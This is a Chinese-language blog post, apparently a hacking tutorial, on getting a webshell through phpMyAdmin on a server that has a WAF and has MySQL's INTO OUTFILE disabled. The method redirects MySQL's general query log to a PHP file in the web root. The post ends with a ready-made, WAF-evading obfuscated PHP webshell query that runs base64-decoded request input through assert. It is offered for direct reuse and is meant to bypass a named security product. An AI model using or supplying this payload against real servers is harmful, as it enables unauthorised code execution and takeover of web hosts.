phpmyadmin新姿勢getshell

標籤：禁用   src   利用   file   記憶體   ice   min   也會   方便   

旁白：在一個有WAF、並且mysql中的Into outfile禁用的情況下，我該如何getshell？

傾旋
email：[email protected]
投稿聯絡：[email protected]

首先環境如下：

 

• OS:Windows 2003
• WAF:Safe Dog 4.0正式版
• phpmyadmin:4.7（許多都可以）
• Mysql:5.5+
• PHP:5.3
• Apache:2.x

目前into outfile已經被禁用，並且WAF也會在寫入檔案的時候攔截。
那麼我們嘗試通過一個腦洞大開的方法去getshell。
（必須是mysql root許可權）

登入phpmyadmin後，查看全域變數：
找到 general log file

這裡是儲存了每一個sql語句執行的日誌（包含SQL語句本身）

但是general log變數必須是ON狀態，代表啟用。

此時我們把general log開啟為ON，然後再去更改general log file的地址為我們的webshell絕對路徑。

在每一次更改general log file的時候mysql都會判斷記錄檔是否存在，如果不存在則會自動建立。

此時該檔案已經建立，並且檔案內容儲存了最後一條SQL語句的日誌資訊。

MySQLa, Version: 5.5.53 (MySQL Community Server (GPL)). started with:
TCP Port: 3306, Named Pipe: MySQL
Time Id Command Argument
121 QuerySHOW GLOBAL VARIABLES WHERE Variable_name="general_log_file"
121 Quit

接下來，我們直接隨意查詢SQL，每一句都會被寫入這個shell.php

由於有WAF，我們採用遠程包含的形式來運行webshell。
在我們的遠程地址裡，放置函數名，使伺服器端訪問它，然後載入到記憶體，直接去調用此函數，再去接收我們提交的php代碼。

關於菜刀免殺，請看上一篇文章。

下面再附上一個SQL查詢免殺shell的語句，方便大家遇到此類情況直接利用：

SELECT "<?php $p = array(‘f‘=>‘a‘,‘pffff‘=>‘s‘,‘e‘=>‘fffff‘,‘lfaaaa‘=>‘r‘,‘nnnnn‘=>‘t‘);$a = array_keys($p);$_=$p[‘pffff‘].$p[‘pffff‘].$a[2];$_= ‘a‘.$_.‘rt‘;$_(base64_decode($_REQUEST[‘username‘]));?>"

可見這邊並沒有攔截：

文章就到這裡啦，這幾天比較忙，都沒有怎麼更新，感謝大家一直以來的支援！

phpmyadmin新姿勢getshell